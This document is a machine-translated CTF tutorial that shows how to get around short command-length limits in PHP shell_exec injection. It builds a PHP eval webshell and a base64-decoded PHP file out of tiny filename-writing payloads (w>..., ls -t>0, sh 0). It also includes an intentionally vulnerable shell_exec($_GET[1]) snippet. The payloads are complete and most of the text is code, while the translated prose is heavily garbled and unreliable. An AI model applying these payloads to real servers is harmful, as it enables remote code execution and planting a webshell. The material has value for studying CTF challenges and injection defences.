Preface:
Will inevitably encounter can perform do ctf Mo command function, but the command length is limited, different lengths of cut-off limit will apply a different connection methods.
1.15 arbitrary command execution controllable character
To perform echo \ <php eval ($ _ GET [1]);?? \ >> 1
echo \<?php >1 echo eval\(>>1 echo \$_GET>>1 echo \[1\]>>1 echo \)\;?>>1
2.7 arbitrary command execution controllable character
1> a or w> b and b, respectively, to create a two empty folder.
ls> c directory of the file name will be written to the file c; ls -t> 0 File names will be written in chronological flashbacks 0 created file. And wrap.
\ Which, after the escape '\' newline is used, which is also connected to line feed.
that\
t
This is representative of cat
For example, this code:
<?php if(strlen($_GET[1])<8){ echo shell_exec($_GET[1]); } ?>
Suppose I want to produce written <PHP? Echo phpinfo ();
echo PD9waHAgcGhwaW5mbygpOw== | base64 -d >1.php
w>hp w>1.p\\ w>d\>\\ w>\-\\ w>e64\\ w>bas\\ w>=\|\\ w>w=\\ w>gpO\\ w>mby\\ w>aW5\\ w>Ghw\\ w>Agc\\ w>waH\\ w>PD9\\ w>o\ \\ w > I \\ ls -t>0 sh 0
Flashbacks new file name, then ls -t> 0, then reverse the order just then 0 is written to a file, and then use 0 as the sh script execution.
3.5 arbitrary command execution controllable character
ls -t> 0 exceeds 5
>ls\\ ls>a >\ \\ >-t\\ >\>0 ls>>a
This will ls -t> 0 written in a script, if you want to use, then direct sh a, after writing his command in the seven logic written on the line.
4.4 arbitrary command execution controllable character
ls -th> f exceeds 4
>f\> >ht- >sl >dir *>v >rev *v>0 cat 0
This will ls -th> f 0 which is written into the script, you can write back commands us to perform as a direct follow seven, and finally the use of sh 0 execute ls -th> f, then write the command f script, do sh f can be.
note:
> py \\ here is a look at five characters, four more than the limit, in fact, because the shell environment need to enter \\ produce \, but when php code exec, just type \ can produce \, such as exec ( "> py \") can be.
This payload place above it are inside the shell in linux terminal operation, it is necessary '\' have been combined with '\' escape, will become a '\\', if injected in the command function which '\' need to use '\' escape.
4 payload configuration command to bypass logic, principle:
Gangster summarize here very clear, and attach a link: https://www.sohu.com/a/208155480_354899